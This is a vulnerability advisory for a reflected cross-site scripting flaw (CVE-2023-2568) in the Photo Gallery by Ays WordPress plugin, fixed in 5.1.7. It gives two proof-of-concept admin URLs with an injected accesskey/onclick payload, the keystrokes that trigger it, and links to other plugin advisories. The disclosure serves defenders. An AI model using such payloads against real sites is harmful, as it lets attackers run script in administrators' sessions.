Photo Gallery by Ays < 5.1.7 – Reflected XSS | CVE 2023-2568 | Plugin Vulnerabilities

Description

The plugin does not escape some parameters before outputting it back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open one of the URLs below

v < 5.1.7 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery-settings&ays_gpg_tab=" accesskey=X onclick=alert(/XSS/)//
v < 5.1.6 - https://example.com/wp-admin/admin.php?page=gallery-photo-gallery&action=edit&gallery=1&ays_gpg_settings_tab=" accesskey=X onclick=alert(/XSS/)//

The XSS will be triggered when pressing ALT+SHIFT+X on Windows and CTRL+ALT+X on OS X

Affects Plugins

gallery-photo-gallery

Fixed in 5.1.7

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

b1704a12-459b-4f5d-aa2d-a96646ddaf3e

Timeline

Publicly Published

2023-05-16 (about 1 years ago)

Added

2023-05-16 (about 1 years ago)

Last Updated

2023-05-16 (about 1 years ago)

Other

Published

Title

Published

2014-08-01

Title

montezuma <= 1.1.3 - XSS in ZeroClipboard.swf

Published

2023-10-09

Title

WP Meta and Date Remover < 2.2.0 - Subscriber+ Stored XSS

Published

2020-01-16

Title

Resim Ara <= 3.0 - Unauthenticated Reflected XSS

Published

2021-10-04

Title

MP3 Audio Player for Music, Radio & Podcast by Sonaar < 2.4.2 - Multiple Admin+ Cross Site Scripting

Published

2019-03-22

Title

Font_Organizer 2.1.1 - Cross-Site Scripting (XSS)